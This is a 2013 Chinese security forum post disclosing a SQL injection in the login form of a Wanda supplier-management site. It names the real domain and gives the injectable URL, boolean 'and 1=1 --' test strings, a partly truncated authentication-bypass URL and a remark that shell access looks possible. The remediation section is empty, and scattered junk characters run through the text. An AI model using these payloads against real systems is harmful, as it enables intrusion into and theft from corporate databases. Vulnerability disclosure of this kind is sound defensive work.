找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2775|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。) v( Q8 V% N9 m+ `# v
详细说明:$ n! \' D. m( E5 S9 U4 {' N9 ]
万达scm系统登陆框sql注入。, H6 I6 @0 F! e( R

# X0 p( n+ K# X- `http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%274 ~$ a8 j1 M2 w2 ?! P

; s) |  ?( V9 B: V
- Z- x4 M# Z' u- L: ]500错误。
' i. ]+ [9 \6 d1 Y" `' v( i& P, b" |, E! V% Q; m
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。; w: N7 f: b+ _8 q9 x
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
/ |# a5 `( z- {3 i截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)! }# M( P9 `0 z' x
经过分析,登陆验证的过程应该是:
1 @. Q" U% P1 W- Z9 y& w6 a1 O0 B& g" h
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。. A/ @0 z0 t1 t3 I- L8 h
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png) @% g3 {- H" Y
4 R; i! s7 t+ c) C* q8 [3 _: |% Q
oracle数据库,存在注入点。@大连万达,你怎么看?5 |, i1 z1 z9 \% c- W9 Q$ R, y& j! j, D
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png* t! B! U2 Z. B. ]

  e0 k! D- K' P  z( C/ b系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。9 m( f  {0 s9 |3 U4 E; Q8 M
漏洞证明:. H  s5 C4 @7 a  s
万达scm系统登陆框sql注入。
" L+ Q1 T$ e- b: W: u
% x7 ~# d# a- \% b" Z2 R8 Ohttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
. M4 c1 i- K; ]2 D, y( h. F4 J; z. v' Z

4 q3 _( a% P5 v7 [: c500错误。
1 W: o0 G3 Z0 n; J2 R$ _
, h6 g. v3 M% U' e0 x/ w. s) c用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。9 v" f5 {9 ~  z# z3 c9 r+ _
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png1 u& i: h) ~% X% Y8 x* b

  Z$ p$ ?- @4 c) n( l5 o" E! S
+ P# `9 s+ p# s' X+ Q% W0 j" m(截图有一点问题)
' E8 {7 ?2 t( i( N- l7 {" F% K; ]+ J- }7 A: O6 D
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:+ n$ d* M2 x# P3 P; o

6 J  C/ ~& D: O( u3 p8 A取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
5 G. I+ i0 ]/ m# X1 \6 T. I' Y9 `. c9 S' M  x8 e% {# @& n6 k
绕过:7 V" u7 v3 u$ X3 J# z& w
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1* n2 S; f$ _/ V' @+ Z
1 Z9 m: c! H; n

2 S. F& K; |2 Xoracle数据库,存在注入点。@大连万达,你怎么看?
5 V& \/ V, t2 g2 @8 J1 Y9 o' C6 [​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
* T- b, B1 l& F; I* p
6 A5 }+ O5 A2 Q3 f修复方案:
& q8 {. ^/ E, k. E。。。% K- S" _3 X7 A

7 d2 Z0 {; n- e- C4 A! q& \( ^' V
厂商已经确认, u7 |# L2 N' s
' n! W2 W" o& C3 g2 d% M
[/td][/tr]
4 a: t' A) {7 q[/table]
& U+ T: K0 r5 ?/ m9 }' U8 t3 }# m4 {$ I) q2 c6 ~* w# @

. D% b# K9 A* \/ Q+ a; C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表